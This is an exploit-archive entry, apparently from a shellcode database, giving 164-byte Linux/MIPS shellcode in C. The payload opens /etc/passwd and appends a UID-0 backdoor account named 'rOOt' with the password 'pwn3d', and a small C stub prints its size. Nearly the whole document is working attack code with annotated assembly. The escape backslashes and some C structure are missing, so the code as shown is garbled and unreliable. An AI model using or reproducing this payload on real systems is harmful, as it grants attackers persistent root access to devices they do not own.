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# Title : Linux/MIPS - add user(UID 0) with password - 164 bytes
# Published : 2011-11-27
# Author :
# Previous Title : SuperH (sh4) Add root user with password
# Next Title : Linux/MIPS - execve /bin/sh - 48 bytes

/* Title:  Linux/MIPS -add user(UID 0) with password - 164 bytes
 * Date:   2011-11-24
 * Author: rigan - imrigan [at] gmail.com
 * Note:
 *         Username - rOOt
 *         Password - pwn3d

#include <stdio.h>

char sc[] = 
        "x24x09x73x50"       //  li      t1,29520
        "x05x30xffxff"       //  bltzal  t1,400094 <L>
        "x24x09x73x50"       //  li      t1,29520 (nop)
     /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */
        "x3cx0fx30x2f"       //  lui     t7,0x302f 
        "x35xefx65x74"       //  ori     t7,t7,0x6574
        "x3cx0ex63x2f"       //  lui     t6,0x632f    
        "x35xcex70x61"       //  ori     t6,t6,0x7061
        "x3cx0dx73x73"       //  lui     t5,0x7373
        "x35xadx77x64"       //  ori     t5,t5,0x7764
        "xafxafxffxf3"       //  sw      t7,-13(sp)
	"xafxaexffxf7"       //  sw      t6,-9(sp)
	"xafxadxffxfb"       //  sw      t5,-5(sp)
        "xafxa0xffxff"       //  sw      zero,-1(sp)
	"x27xa4xffxf4"       //  addiu   a0,sp,-12
        "x24x05x01x6d"       //  li      a1,365
        "x24x02x0fxa5"       //  li      v0,4005
        "x01x01x01x0c"       //  syscall 0x40404

	"xafxa2xffxfc"       //  sw      v0,-4(sp)
     /* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bashn", 45);	*/
        "x8fxa4xffxfc"       //  lw      a0,-4(sp)
        "x23xe5x10x0c"       //  addi    a1,ra,4108
        "x20xa5xf0x60"       //  addi    a1,a1,-4000
        "x24x09xffxd3"       //  li      t1,-45
        "x01x20x30x27"       //  nor     a2,t1,zero
        "x24x02x0fxa4"       //  li      v0,4004
        "x01x01x01x0c"       //  syscall 0x40404
      /* close(fd); */
        "x24x02x0fxa6"       //  li      v0,4006
        "x01x01x01x0c"       //  syscall 0x40404
      /* exit(0);  */
       "x28x04xffxff"        //  slti    a0,zero,-1
       "x24x02x0fxa1"        //  li      v0,4001
       "x01x01x01x0c"        //  syscall 0x40404
      /*  "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bashn" */
void main(void)
       printf("size: %dn", strlen(sc));
       s = sc;